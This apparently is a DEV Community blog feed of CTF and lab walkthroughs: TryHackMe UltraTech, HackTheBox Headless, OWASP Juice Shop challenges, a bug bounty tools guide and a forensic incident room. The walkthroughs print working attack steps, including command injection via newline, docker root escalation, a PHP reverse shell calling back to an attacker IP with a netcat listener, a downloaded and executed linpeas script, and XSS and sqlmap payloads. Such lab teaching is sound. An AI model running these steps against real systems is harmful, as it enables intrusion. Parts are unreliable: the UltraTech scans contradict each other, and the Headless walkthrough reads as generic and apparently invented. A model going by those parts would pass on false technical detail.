DEV Community: haXarubiX

TryHackMe UltraTech Room Walkthrough

haXarubiX — Mon, 31 Mar 2025 05:57:42 +0000

1. Exporting the IP Address

The first command is:

export IP=10.10.82.85

Explanation:
- This command sets an environment variable called IP with the value 10.10.82.85 (the IP of the target machine).
- Why use it? It makes it easier to reference the IP in future commands without needing to type it every time. By using $IP later, you reference this stored value.

Basic Example:

If you wanted to run the command ping the IP, you could now type:

ping $IP

And this would automatically translate to:

ping 10.10.82.85

2. Nmap Enumeration

Initial Nmap Scan

We perform a basic scan to gather information about the target services:

nmap -sC -sV -v $IP -oN nmap/initial.nmap

Explanation:
- nmap: This is a network scanning tool used to discover hosts and services.
- sC: This option runs the default Nmap scripts, which are designed to detect common vulnerabilities or gather information.
- sV: Detects service versions, helping you know the specific versions of the services running on the open ports.
- v: Enables verbose mode, which provides more detailed output during the scan.
- oN nmap/initial.nmap: Saves the results to a file (nmap/initial.nmap) for review later.

Why This Matters:

This scan helps identify the types of services running (like SSH, FTP, or HTTP) and their version numbers, which could help find vulnerabilities or misconfigurations.

Explanation of Nmap Results

From the scan, we get this output:

PORT      STATE SERVICE VERSION
21/tcp    open  ftp     vsftpd 3.0.3
22/tcp    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3
31331/tcp open  http    Apache httpd 2.4.29 (Ubuntu)

Port 21 (FTP):
- Service: vsftpd (Very Secure FTP Daemon), version 3.0.3.
- FTP is a protocol for file transfer, and in some cases, FTP can allow for anonymous access, where anyone can log in without credentials.
Port 22 (SSH):
- Service: OpenSSH, a secure shell service used for remote login and command execution. Version 7.6p1 is running.
- SSH is typically secured with usernames and passwords or key-based authentication.
Port 31331 (HTTP):
- Service: Apache, a popular web server. This is where the website runs. The version is 2.4.29, which might have vulnerabilities depending on its configuration.

Next Step: Full Port Scan

Now, let’s scan all ports on the machine. This helps catch any ports that were missed in the first scan.

nmap -p- -T5 -v $IP -oN nmap/all_ports.nmap

Explanation:
- p-: Scans all 65,535 ports (not just the common ones).
- T5: This is the timing option; 5 is the fastest but might miss some results. In some cases, you’ll want to use T4 (slower, more accurate).
- oN: Again, saving the output for future reference.

Explanation of Full Nmap Scan Results

PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
8081/tcp open  blackice-icecap

Port 8081:
- This port appears to be running Node.js, a JavaScript framework. Since this wasn't picked up in the initial scan, the all-ports scan reveals more services we can investigate.

3. Investigating Specific Ports

Now, since we identified a service on port 8081, let's dig deeper to see what’s running on that port.

nmap -sV -p 8081 $IP -oN port_8081.nmap

Explanation:
- sV: Attempts to detect the service version.
- p 8081: Only scan port 8081.
- oN: Saves the output to port_8081.nmap.

Nmap Result for Port 8081

PORT     STATE SERVICE VERSION
8081/tcp open  http    Node.js Express framework

Node.js Express Framework:
- This is a web framework often used for building APIs and web applications. If it’s not properly secured, it might be vulnerable to command injection or other attacks.

4. Gobuster Directory Brute Forcing

We know that port 31331 is running a web server (Apache). Now, we can use Gobuster to brute force directories and files.

Brute Forcing Directories on Port 31331

gobuster dir -t 64 -u <http://$IP:31331> -w ~/wordlists/website_dir/directory-list-2.3-medium.txt -x .php,.html,.txt -o gobuster/dir_med_31331.gobuster

Explanation:
- gobuster: Tool used to brute force directories on websites.
- dir: Directory brute forcing mode.
- t 64: Uses 64 threads (speeding up the process).
- u: The target URL (http://$IP:31331).
- w: The wordlist you use to brute force (in this case, a medium-sized directory list).
- x: Brute forces file extensions like .php, .html, .txt.
- o: Saves the output to a file (gobuster/dir_med_31331.gobuster).

Results:

/partners.html        (Status: 200)
/robots.txt           (Status: 200)

robots.txt is a file that tells search engines which directories they should avoid indexing. Sometimes, it contains useful information about hidden or important directories.

Check Robots.txt:

curl <http://$IP:31331/robots.txt>

This gives us:

/utech_sitemap.txt

Check Sitemap:

curl <http://$IP:31331/utech_sitemap.txt>

This sitemap shows the important directories on the web server:

/
/index.html
/what.html
/partners.html

Navigating to /partners.html shows a login page, and trying to log in reveals that the form sends login requests to port 8081 (/auth endpoint). This is interesting because we might be able to inject commands here.

5. Exploring Vulnerabilities

The service on port 8081 has a ping functionality. This might be vulnerable to command injection if not properly sanitized.

Test for Command Injection

First, let’s set up a tcpdump session on our own machine to capture ping requests:

tcpdump -i utun1 icmp

Explanation:
- tcpdump: This is a network traffic analyzer.
- i utun1: This specifies the network interface. You may need to adjust the interface depending on your system (use ifconfig or ip addr to find the right one).

Send a Ping Request to Your Machine

curl "<http://$IP:8081/ping?ip=YOUR_IP>"

If the service is vulnerable, you should see an ICMP packet captured by tcpdump on your machine.

6. Exploiting Command Injection

To exploit this, we need to inject commands into the ping request.

Injecting Commands Using URL Encoding

We know that %0A is the URL-encoded form of a newline (\\n). This lets us inject additional commands. Let’s try running an ls command:

curl "<http://10.10.82.85:8081/ping?ip=YOUR_IP%0Als>"

Explanation:
- %0A: Newline, which allows us to execute a second command (ls).
- This results in a directory listing:
```
index.js
node_modules
package.json
```

Extracting Sensitive Data

Let’s attempt to read files from the server, such as a database:

curl "<http://10.10.82.85:8081/ping?ip=YOUR>

_IP%0Acat%20<file_path>"

We retrieve sensitive information, including usernames and password hashes.

7. Privilege Escalation via Docker

After logging in via SSH (using cracked credentials), we check for potential privilege escalation paths.

Check for Docker Group Membership

id

We find the user is part of the docker group, which can be exploited to gain root access.

Exploiting Docker for Privilege Escalation

Use GTFObins to escalate privileges by running a Docker container with access to the entire filesystem:

docker run -v /:/mnt --rm -it bash chroot /mnt sh

Explanation:
- v /:/mnt: Mounts the root of the filesystem (/) to /mnt in the Docker container.
- chroot /mnt sh: Changes the root to /mnt and spawns a shell with root privileges.

Now, you have full root access to the system.

Kali Linux + OWASP-Top10 Bug Bounty Guide ( How to Bug Bounty)

haXarubiX — Fri, 21 Feb 2025 23:33:48 +0000

Bug-Bounty Using Kali-Linux & OWASP-Top10

OWASP Top 10 Vulnerabilities

The OWASP Top 10 list includes the most critical security risks for web applications:

Rank	Vulnerability
A01:2021	Broken Access Control
A02:2021	Cryptographic Failures
A03:2021	Injection
A04:2021	Insecure Design
A05:2021	Security Misconfiguration
A06:2021	Vulnerable and Outdated Components
A07:2021	Identification and Authentication Failures
A08:2021	Software and Data Integrity Failures
A09:2021	Security Logging and Monitoring Failures
A10:2021	Server-Side Request Forgery (SSRF)

Overview

1. Getting Started with Bug Bounties

1.1 Research and Registration
- Step 1: Research and choose bug bounty platforms like HackerOne or Bugcrowd.
- Step 2: Register on these platforms by creating a hacker profile.
- Step 3: Review the rules of engagement for each program you wish to participate in (make sure you follow the target's scope).
- Step 4: Start by choosing beginner-friendly programs with open scopes. I know it sucks but doing bounties that are unpaid is one of the best ways to get invited to private programs. (( My advice utilize HackTheBox or TryHackMe Bug Bounty Paths

2. Preparing Your Environment

2.1 Setting up the Tools
- SubFinder (Subdomain Enumeration):
  - Step 1: Install Go language: sudo apt install golang-go.
  - Step 2: Install SubFinder: go install -v github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest.
  - Step 3: Test SubFinder installation: subfinder -v.
- httpx (Check Alive Subdomains):
  - Step 1: Install httpx: go install -v github.com/projectdiscovery/httpx/cmd/httpx@latest.
  - Step 2: Verify the installation: httpx -v.
- Katana (Content Discovery):
  - Step 1: Install Katana: go install github.com/projectdiscovery/katana/cmd/katana@latest.
  - Step 2: Run and verify: katana -v.
- Dirsearch (Directory Brute-forcing):
  - Step 1: Install using Git: git clone <https://github.com/maurosoria/dirsearch.git>.
  - Step 2: Navigate to the directory: cd dirsearch.
  - Step 3: Run Dirsearch: python3 dirsearch.py.
- Nuclei (Vulnerability Scanning):
  - Step 1: Install: go install -v github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest.
  - Step 2: Verify: nuclei -v.

3. OWASP Top 10 Vulnerabilities

The OWASP Top 10 list includes the most critical security risks for web applications:

Rank	Vulnerability
A01:2021	Broken Access Control
A02:2021	Cryptographic Failures
A03:2021	Injection
A04:2021	Insecure Design
A05:2021	Security Misconfiguration
A06:2021	Vulnerable and Outdated Components
A07:2021	Identification and Authentication Failures
A08:2021	Software and Data Integrity Failures
A09:2021	Security Logging and Monitoring Failures
A10:2021	Server-Side Request Forgery (SSRF)

4. Bug Bounty Methodology

4.1 Reconnaissance
- Nmap: This is a OWASP focused walk-through so you can use nmap but the steps below utilize OWASP Tools but for a basic nmap scan run `nmap -sC -sV -oN bountyprojectname.nmap
- SubFinder: Start by running SubFinder to discover subdomains of your target.
  - Command: subfinder -d <target_domain> -o subdomains.txt.
  - Sub-Step: Store the output and analyze the domain structure.
- httpx: Check which subdomains are alive and gather information.
  - Command: cat subdomains.txt | httpx -title -status-code -o alive_subdomains.txt.
  - Sub-Step: Analyze active subdomains to prioritize them.
- OWASP Top 10 Focus: Look for possible security misconfigurations (A05) by checking SSL and headers.
4.2 Content Discovery
- Katana: Use Katana to find directories and sensitive content across subdomains.
  - Command: katana -u https://<target_domain> -o content.txt.
  - Sub-Step: Look for directories, files, and JavaScript endpoints that may expose sensitive information.
- Dirsearch: Use Dirsearch to brute-force hidden files and directories.
  - Command: python3 dirsearch.py -u https://<target_domain> -w /path/to/wordlist.txt -o dir_results.txt.
  - Sub-Step: Analyze results for possible sensitive directories such as admin panels or configuration files (A03 Injection, A05 Misconfiguration).
- OWASP Top 10 Focus: Hidden directories can lead to unauthorized access or information leaks (A01 Broken Access Control).

5. Identifying Vulnerabilities

5.1 Injection Attacks
- SQL Injection (A03): Use SQLMap or manual techniques to check for SQL injection vulnerabilities.
  - Command: sqlmap -u '<https://target.com?id=1>' --batch --dbs.
- Command Injection (A03): Look for command injection points in forms or URL parameters.
5.2 Cross-Site Scripting (XSS)
- Step 1: Test for reflected or stored XSS vulnerabilities in input fields.
- Step 2: Use payloads like "><script>alert(1)</script>.
- OWASP Focus: XSS falls under A03 (Injection).

6. Advanced Vulnerability Scanning

6.1 Nuclei for Vulnerability Scanning
- Command: nuclei -u https://<target_domain> -t cves/ -o vuln_report.txt.
- Sub-Step: Use the default templates and CVE detection for rapid scanning.
- Custom Templates: Add your own YAML templates for custom vulnerability detection.
- OWASP Top 10 Focus: Use Nuclei to find vulnerabilities in components (A06 Vulnerable and Outdated Components).

7. Reporting

7.1 Creating the Report
- Step 1: Organize your findings by vulnerability type.
- Step 2: Provide proof of concept (PoC) for each vulnerability.
- Step 3: Offer remediation steps where possible.
- Step 4: Submit the report through the appropriate bug bounty platform.
7.2 Follow-Up
- Be prepared for follow-up questions from the security team.

8. Continuous Improvement

8.1 Learning from the Community
- Join bug bounty forums and participate in discussions.
- Engage with write-ups from experienced hackers on platforms like Hacker1 or Bugcrowd.

Stay on the look out for the Ultimate Bug Bounty Guide i will be releasing soon. I made sure it is extremely detailed in depth and easy to follow.

OWASP JS Sensitive Data Exposure Confidential Document

haXarubiX — Tue, 28 Jan 2025 07:16:25 +0000

Sensitive Data Exposure Confidential Document

"Sensitive Data Exposure - Confidential Document" challenge in the OWASP Juice Shop.

Step 1: Understand the Challenge

The challenge is to access a confidential document within the Juice Shop application. This often involves finding and accessing a file or endpoint that contains sensitive information which should not be publicly accessible.

Step 2: Explore the Application

Browse Different Pages: Go through various sections of the Juice Shop, including the home page, admin sections, and user profiles.
Inspect Elements: Use your browser's developer tools to inspect elements and look for hidden or commented-out URLs that might point to sensitive documents.

Step 3: Use Developer Tools

Open Developer Tools: Right-click on the page and select "Inspect" or press F12.
Check Network Tab: Monitor network requests to see if any files are being loaded that look like they could contain sensitive data.

Step 4: Look for Clues in the Application

Look for Suspicious Links or Files: Sometimes, the Juice Shop has links or files hidden in the source code.
Check Robots.txt: Navigate to http://your-juice-shop-url/robots.txt. This file often contains paths to files or directories that are intended to be hidden from search engines.

Step 5: Common Paths and Files

OWASP Juice Shop sometimes uses predictable paths for sensitive documents. Here are some paths to try:

Check /ftp directory:
- Navigate to http://your-juice-shop-url/ftp.
- Look for any files listed in the directory.
Check for /admin directory:
- Navigate to http://your-juice-shop-url/admin.
- See if there are any accessible files or directories.

Step 6: Try Specific URL Paths

Accessing the Confidential Document:
- Navigate to http://your-juice-shop-url/ftp/legal.md.
- This file often contains a legal document that is part of the sensitive data exposure challenge.
Alternative Path:
- Navigate to http://your-juice-shop-url/ftp/acquisitions.md.

Step 7: Verify the Challenge Completion

Once you access the correct confidential document, the Juice Shop application will typically provide a notification or update the challenge progress indicating that you have completed the challenge.

Detailed Example

Navigate to the Juice Shop Application: Open your Juice Shop application in your web browser.
Check robots.txt:
- Open http://your-juice-shop-url/robots.txt.
- Look for disallowed paths like /ftp or /admin.
Access Potential Confidential Documents:
- Go to http://your-juice-shop-url/ftp/legal.md.
- If that doesn't work, try http://your-juice-shop-url/ftp/acquisitions.md.
Verify:
- Once you open one of these files, look for the notification from the Juice Shop indicating that the challenge is complete.

Example URL Paths:

http://your-juice-shop-url/ftp/legal.md
http://your-juice-shop-url/ftp/acquisitions.md

By following these steps, you should be able to locate and access a confidential document.

OWASP JS XSS Bonus Payload

haXarubiX — Tue, 28 Jan 2025 07:12:36 +0000

The goal is to use the following iframe to perform a DOM XSS attack:

Step-by-Step Walkthrough:

Step 1: Identify Potential Injection Points

Like the last DOM XSS challenge, you need to find an input field or URL parameter in the Juice Shop where you can inject the payload.

Step 2: Select a Suitable Injection Point

Search Bar: Often a good starting point.
Feedback Form: Another common target.
URL Parameters: Look for places in the URL where input is reflected back to the DOM.

Step 3: Test the Payload

Here, we'll walk through using the search bar as an example:

Navigate to the Juice Shop Application: Open your Juice Shop application in your web browser.
Locate the Search Bar: Usually found at the top of the page.

Step 4: Inject the Bonus Payload

Enter the Payload into the Search Bar: Paste the provided iframe payload into the search bar:

<iframe width="100%" height="166" scrolling="no" frameborder="no" allow="autoplay" src="https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/771984076&color=%23ff5500&auto_play=true&hide_related=false&show_comments=true&show_user=true&show_reposts=false&show_teaser=true"></iframe>

<iframe width="100%" height="166" scrolling="no" frameborder="no" allow="autoplay" src="https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/771984076&color=%23ff5500&auto_play=true&hide_related=false&show_comments=true&show_user=true&show_reposts=false&show_teaser=true"></iframe>
Submit the Search: Press Enter or click the search button.

Step 5: Observe the Result

If the search functionality is vulnerable to DOM XSS, the iframe should be rendered in the DOM, and you should see the SoundCloud player appear on the page.

Step 6: Verify Challenge Completion

The OWASP Juice Shop application will typically provide a notification or update the challenge progress once the iframe is successfully injected and rendered.

Troubleshooting Tips:

Inspect the Page: Use browser developer tools to inspect how the search query is being processed and displayed in the DOM.
Try Different Inputs: If the search bar doesn't work, try other input fields like the feedback form or URL parameters.

Example Using URL Parameters

Navigate to a Page with URL Parameters: For instance, a product details page might have a URL like http://your-juice-shop-url/#/product/1.

Modify the URL Parameter: Append the iframe payload to a parameter in the URL, such as:

http://your-juice-shop-url/#/search?q=<iframe width="100%" height="166" scrolling="no" frameborder="no" allow="autoplay" src="https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/771984076&color=%23ff5500&auto_play=true&hide_related=false&show_comments=true&show_user=true&show_reposts=false&show_teaser=true"></iframe>

http://your-juice-shop-url/#/search?q=<iframe width="100%" height="166" scrolling="no" frameborder="no" allow="autoplay" src="https://w.soundcloud.com/player/?url=https%3A//api.soundcloud.com/tracks/771984076&color=%23ff5500&auto_play=true&hide_related=false&show_comments=true&show_user=true&show_reposts=false&show_teaser=true"></iframe>
Load the Page: Hit Enter and see if the SoundCloud player is rendered

OWASP Juice-Shop Walkthrough; Sensitive Data Exposure - Login Amy

haXarubiX — Sat, 07 Dec 2024 23:40:45 +0000

Sensitive Data Exposure - Login Amy

Objective

Steps to Complete the Challenge

Setting Up Burp Suite and FoxyProxy

Install Burp Suite:
- Burp Suite is usually pre-installed on Kali Linux. If not, you can install it using:
```
sudo apt-get update
sudo apt-get install burpsuite
```
Start Burp Suite:
- Open a terminal and type burpsuite to start Burp Suite.
- You may need to agree to the license agreement and select the "Temporary project" option.
Configure Burp Suite Proxy:
- In Burp Suite, go to the "Proxy" tab and then the "Options" sub-tab.
- Ensure that the interface is set to 127.0.0.1 and port 8080.
Install FoxyProxy:
- Open Firefox and go to the Firefox Add-ons website.
- Search for "FoxyProxy" and install it.
Configure FoxyProxy:
- Click on the FoxyProxy icon in the toolbar and select "Options".
- Add a new proxy by clicking "Add".
  - Title: Burp Suite
  - Proxy Type: HTTP
  - Proxy IP: 127.0.0.1
  - Port: 8080
- Save the configuration.
Enable FoxyProxy:
- Click on the FoxyProxy icon and select the "Burp Suite" proxy profile to enable it.
- To disable it, select "Turn Off All Proxies".

Brief Tutorial on Burp Suite

Proxy: Intercepts and inspects HTTP/S traffic between your browser and the server.
Repeater: Allows you to modify and resend individual requests.
Intruder: Automates customized attacks by modifying request parameters.
Scanner: Scans for common vulnerabilities (available in Burp Suite Professional).
Decoder: Decodes or encodes data in various formats.
Comparer: Compares different responses to identify differences.

Detailed Walkthrough for "Login Amy"

Log In to Juice Shop:
- Open Firefox and navigate to http://localhost:3000.
- Ensure FoxyProxy is enabled and Burp Suite is intercepting traffic.
Identify Amy's User Account:
- Typically, Juice Shop users are listed in the "Contact" or "About Us" sections. Look for any mentions of user accounts, especially Amy's.
- Open the browser’s DevTools (by pressing F12), and go to the "Network" tab to inspect traffic.
Intercept Login Request:
- Attempt to log in with a dummy account to capture the login request in Burp Suite.
- Enter any email and password, and submit the form.
- Burp Suite will capture the request. Send this request to the Repeater tab by right-clicking and selecting "Send to Repeater".
Analyze Sensitive Data Exposure:
- In Burp Suite, go to the "HTTP history" tab and look for responses that may contain sensitive data.
- Specifically, look for responses that might reveal Amy's password or hints. Juice Shop sometimes exposes sensitive data in unexpected places, such as comments in HTML or through API responses.
Look for Password Hints:
- Open the "Source" tab in the browser’s DevTools and search through JavaScript files and HTML for any comments or hints. Sometimes, developers leave comments or notes that can expose sensitive information.
- Look for any clues related to passwords or user information.
Exploit Sensitive Data Exposure:
- If you find any hints or exposed credentials for Amy, use them to log in.
- Commonly, sensitive data exposure can be found in /ftp or /logs directories within the application. Navigate to these paths in the browser or through captured traffic to look for clues.
Log in with Amy's Credentials:
- Once you have identified Amy’s credentials, go back to the login page at http://localhost:3000/#/login.
- Enter Amy’s email and the password you have found.
- Submit the form to log in.

Explanation

Why These Methods Work

Sensitive Data Exposure: Developers sometimes leave sensitive information exposed in comments, debug logs, or misconfigured endpoints. By inspecting network traffic and source code, these pieces of information can be uncovered.
Intercepting Requests: Burp Suite allows you to capture and analyze HTTP requests and responses, making it easier to identify and exploit vulnerabilities.

Importance of Protecting Sensitive Data

Ensuring sensitive data is not exposed through comments, logs, or API responses is crucial for maintaining application security.
Proper data handling and encryption practices should be implemented to protect user credentials and other sensitive information.

HackTheBox Headles Walkthrough

haXarubiX — Sat, 07 Dec 2024 23:25:42 +0000

Headless

Step 1: Reconnaissance

Start by scanning the machine with Nmap to identify open ports and services.

nmap -sC -sV -oN headless.nmap <machine-ip>

sC: Run default scripts.
sV: Detect service versions.
oN: Output scan results to a file.

Expected Output:

PORT    STATE SERVICE VERSION
22/tcp  open  ssh     OpenSSH 7.4p1 Debian 10+deb9u7 (protocol 2.0)
80/tcp  open  http    Apache httpd 2.4.25 (Debian)

From the scan, we learn that the server is running SSH on port 22 and Apache HTTP on port 80.

Step 2: Web Enumeration

Let’s check the web server on port 80 by navigating to http://<machine-ip> in your browser. You should see a basic web page. Next, we’ll use Gobuster to enumerate directories.

gobuster dir -u http://<machine-ip> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt

Expected Output:

/.hta                 (Status: 403) [Size: 294]
/.htaccess            (Status: 403) [Size: 294]
/.htpasswd            (Status: 403) [Size: 294]
/robots.txt           (Status: 200) [Size: 28]

There is a robots.txt file. Let’s inspect it:

curl http://<machine-ip>/robots.txt

Expected Output:

User-agent: *
Disallow: /upload

This file disallows access to the /upload directory, which is worth checking out. Visit http://<machine-ip>/upload in your browser, and you should find an upload form.

Step 3: Exploiting the File Upload

Try uploading a simple PHP reverse shell to the server. You can get one from PentestMonkey.

First, download the reverse shell:

wget <https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php>

Open the file and modify the IP address and port to match your attacking machine:

nano php-reverse-shell.php

Change:

$ip = 'your-ip'; // IP address of your machine
$port = 4444;   // Port on which your listener will run

Now, attempt to upload the PHP shell via the web form. Once uploaded, you can access it through the URL:

http://<machine-ip>/upload/your_shell.php

But before visiting the URL, set up a listener on your machine using Netcat:

nc -lvnp 4444

If the upload is successful, visiting the PHP file should trigger the reverse shell, and you should get a connection.

Step 4: Gaining a Shell

Once you have a reverse shell, stabilize it:

python3 -c 'import pty; pty.spawn("/bin/bash")'
export TERM=xterm

Step 5: Privilege Escalation

Let’s enumerate the system for privilege escalation possibilities. Start by checking sudo privileges:

sudo -l

If no immediate sudo privileges are available, check for SUID binaries:

find / -perm -u=s -type f 2>/dev/null

Alternatively, you can use LinPEAS to automate the enumeration process. Download and execute it:

wget <https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh>
chmod +x linpeas.sh
./linpeas.sh

Step 6: Exploiting a Vulnerability

During the enumeration, you may find an exploitable vulnerability, such as a misconfigured service, outdated software, or a SUID binary that can be abused for privilege escalation. Follow through with the appropriate exploit method depending on the findings.

Step 7: Capture the Flags

Once you escalate privileges to root, navigate to the home directories to find the flags.

For the user flag:

cat /home/<username>/user.txt

For the root flag:

cat /root/root.txt

Conclusion

With that, you’ve completed the Headless box on Hack The Box. Remember, the specific vulnerability exploited might vary based on enumeration results, so always adapt based on what you find during enumeration.

TryHackMe API Wizard Breach Walkthrough

haXarubiX — Tue, 05 Nov 2024 06:30:31 +0000

Task 1: Preparation

Step 1.1 SSH into the Machine

SSH into the box with the credentials provided.

ssh <username>@<IP_address>
# Replace <username> and <IP_address> with the values given

Task 2: Initial Access

Question 1: Which programming language is the web application written in?

Navigate through the directories to find the application’s code.

cd /home/support/api_service
ls -la

Answer: Python

Question 2: What is the IP address that attacked the web server?

The web server uses NGINX, so we can check its logs for suspicious activity.

cd /var/log/nginx
tail -n 10 access.log.1

Look for commands like whoami, pwd, or id, which indicate enumeration attempts by an attacker.

Answer: 149.34.244.142

Question 3: Which vulnerability was found and exploited in the API service?

Inspect the api.py source code for vulnerabilities, particularly around command handling.

cat /home/support/api_service/api.py

Answer: OS command injection

Question 4: Which file contained the credentials used to privilege escalate to root?

Examine the configuration file for any stored credentials.

cat /home/dev/apiservice/src/config.py

Answer: /home/dev/apiservice/src/config.py

Question 5: What file did the hacker drop and execute to persist on the server?

Check the bash history to uncover any evidence of files dropped.

sudo su
cat /root/.bash_history

Answer: /tmp/rooter2

Question 6: Which service was used to host the “rooter2” malware?

In .bash_history, look for commands involving file uploads or downloads.

Answer: transfer.sh

Task 3: Further Actions

Question 7: Which two system files were infected to achieve cron persistence?

Check crontab and environment files for unauthorized entries.

cat /etc/crontab
cat /etc/environment

Answer: /etc/crontab, /etc/environment

Question 8: What is the C2 server IP address of the malicious actor?

Locate the IP address associated with the SYSTEMUPDATE variable in /etc/environment or other files identified in bash history.

Answer: 5.230.66.147

Question 9: What port is the backdoored bind bash shell listening on?

Use ps to check running processes for a netcat listener.

ps -aux | grep nc

Answer: 3578

Question 10: How does the bind shell persist across reboots?

Locate the systemd service created by the attacker.

grep -R "nc -l" /

Answer: systemd service

Question 11: What is the absolute path of the malicious service?

Find the absolute path from the output of the grep command above.

Answer: /etc/systemd/system/socket.service

Task 4: Even More Persistence

Question 12: Which port is blocked on the victim’s firewall?

Use iptables to examine the firewall configuration.

iptables -L

Answer: 3578

Question 13: How do the firewall rules persist across reboots?

Check the root user's bash configuration files for persistence mechanisms.

cat /root/.bashrc

Answer: /root/.bashrc

Question 14: How is the backdoored local Linux user named?

Inspect the /etc/passwd file for unusual user entries.

grep "/bin/bash" /etc/passwd

Answer: support

Question 15: Which privileged group was assigned to the user?

Use the groups command to list group memberships for the user.

groups support

Answer: sudo

Question 16: What is the strange word on one of the backdoored SSH keys?

View the authorized_keys file in the root user’s SSH directory.

cat /root/.ssh/authorized_keys

Answer: ntsvc

Question 17: Can you spot and name one more popular persistence method? Not a MITRE technique name.

Check for files with the SUID bit set.

find / -perm -u=s -type f 2>/dev/null

Answer: SUID binary

Question 18: What are the original and the backdoored binaries from question 6?

Verify the integrity of the suspected binary.

ls -l /usr/bin/clamav
dpkg --verify clamav

Answer: /usr/bin/bash, /usr/bin/clamav

Question 19: What technique was used to hide the backdoor creation date?

Identify timestamp modification.

Answer: Timestomping

Task 5: Final Target

Question 20: What file was dropped which contained gathered victim information?

Check root’s .bash_history for evidence of dropped files.

cat /root/.bash_history

Answer: /root/.dump.json

Question 21: According to the dropped dump, what is the server’s kernel version?

Decode and inspect .dump.json for details.

cat /root/.dump.json | base64 -d

Answer: 5.15.0–78-generic

Question 22: Which active internal IPs were found by the “rooter2” network scan?

Identify internal IPs from the dump.

Answer: 192.168.0.21,192.168.0.22

Question 23: How did the hacker find an exposed HTTP index on another internal IP?

Check the history for a network scan command.

grep -i "nc -zv" /root/.bash_history

Answer: nc -zv 192.168.0.22 1024-10000 2>&1 | grep -v failed

Question 24: What command was used to exfiltrate the CDE database from the internal IP?

Locate the wget command in the history.

grep "wget" /root/.bash_history

Answer: wget 192.168.0.22:8080/cde-backup.csv

Question 25: What is the most secret and precious string stored in the exfiltrated database?

Inspect the contents of the exfiltrated .review.csv file.

cat .review.csv | head -n 10

Answer: pwned{v3ry-secur3-cardh0ld3r-data-environm3nt}

Another skill acquired, another challenge conquered in the Rubixverse. Keep hacking the limits... until the next hack.

OWASP Juice Shop DOM XSS Walkthrough

haXarubiX — Mon, 21 Oct 2024 02:52:07 +0000

Let's dive into setting up and exploring the first two vulnerabilities in OWASP Juice Shop: Scoreboard and DOM XSS. Without accessing

Setting Up Juice Shop with Docker (Quick Recap)

If you haven't already set up Juice Shop using Docker, here's a quick recap:

Pull the Juice Shop image:

   docker pull bkimminich/juice-shop

Run Juice Shop:

   docker run --rm -p 3000:3000 bkimminich/juice-shop

Access Juice Shop in your browser at http://localhost:3000.

1. Scoreboard Challenge

The Scoreboard is where Juice Shop tracks and displays all the challenges you've solved. This challenge involves finding a way to access the Scoreboard without manually solving other challenges.

Steps to Access the Scoreboard:

Open the Developer Tools:
- Right-click anywhere on the page and select Inspect (this opens Developer Tools).
- Go to the Console tab.
Search for the Scoreboard:
- In the Console, Juice Shop gives away some hints if you inspect closely. Type the following to try and locate the scoreboard:
```
 document.querySelector('iframe')
```

This will display the iframe element containing the Scoreboard.

Manipulate the DOM:
- Once you've identified the iframe, you can try to access its content by playing around with the code in the console.
- One common method is looking for the URL of the scoreboard in the source code by checking the network requests or hidden elements.
Access the Scoreboard Directly:
- Juice Shop’s scoreboard is often located at an easily guessable path. Try visiting:
http://localhost:3000/#/score-board

This should take you directly to the scoreboard, showing all challenges.

Exploiting the Scoreboard:

The Scoreboard doesn't require a complex exploit, but accessing it reveals all the challenges, giving you insight into the available challenges and their difficulties.

2. DOM-based XSS (Cross-Site Scripting)

DOM XSS occurs when the malicious script is executed as part of the web page's Document Object Model (DOM) rather than through traditional server-side input.

Steps to Perform DOM XSS in Juice Shop:

Identify the Vulnerable Field:
- Navigate to the Contact Us page (http://localhost:3000/#/contact).
- There is a feedback form where users can submit messages.
Inject XSS Payload:
- In the feedback form, enter the following payload in the "Comment" field:
```
 <script>alert('XSS')</script>
```

Submit the form and observe if the alert box pops up. This is the simplest way to check for basic XSS vulnerability.

Explore the DOM Behavior:
- DOM-based XSS happens if the website uses the data from the comment field directly into the page’s HTML/JS without proper sanitization.
- You can inspect the page source and see if any data you input is being reflected directly in the DOM, which leads to execution of your injected script.
Bypassing Basic Filters:
- Sometimes, Juice Shop may filter out <script> tags. Try other payloads to bypass this:
```
 <img src=x onerror=alert('XSS')>
```

Or use more advanced payloads based on the context in which the input is being reflected.

Validate Your Exploit:
- If successful, you should see an alert or be able to manipulate the page's DOM via the injected code.
- Your goal is to make Juice Shop execute your JavaScript code, demonstrating the DOM XSS vulnerability.

Wrapping Up

In this combined Scoreboard and DOM XSS challenge, you've explored:

How to access the Scoreboard by inspecting elements and understanding Juice Shop's structure.
How to exploit a DOM XSS vulnerability by manipulating input fields and injecting malicious JavaScript into the page.

Next, we can start with more of what some would call the "fun stuff," so stay tuned and welcome to the Rubixverse.

OWASP Juice-Shop Series Pt.1 Set-Up with Docker < Win. Mac & Linux>

haXarubiX — Sun, 06 Oct 2024 05:13:57 +0000

Introduction to OWASP Juice Shop and Setting Up the Environment

Welcome to the first post in our series on hacking OWASP Juice Shop! Throughout this blog, we will explore the vulnerabilities and security challenges present in this intentionally vulnerable web application. Juice Shop is designed to help ethical hackers and penetration testers hone their skills and practice hacking in a safe environment.

In this series, we will use Docker to run Juice Shop, ensuring an easy setup across various platforms like Windows, macOS, and Linux. I’ll provide step-by-step instructions for setting up Docker on all major systems, so you can follow along no matter what operating system you’re using. Once Juice Shop is up and running, we’ll dive into finding and exploiting common web vulnerabilities.

Let’s start by setting up Docker, which will make it easy to run Juice Shop on any platform. Below are the instructions for installing Docker Desktop on Windows and macOS, and Docker on Debian-based Linux distributions like Ubuntu and Kali Linux.

Installing Docker

1. For Windows (Docker Desktop)

Visit the Docker Desktop website: Docker Desktop for Windows.
Click on Download for Windows.
Once the installer is downloaded, open it and follow the installation steps:
- Agree to the terms and conditions.
- Allow Docker Desktop to use WSL 2 (recommended).
After installation, launch Docker Desktop from the Start menu.
Verify Docker is running by opening a command prompt and typing:

   docker --version

If installed successfully, you should see the Docker version number.

2. For macOS (Docker Desktop)

Visit the Docker Desktop website: Docker Desktop for Mac.
Click on Download for Mac.
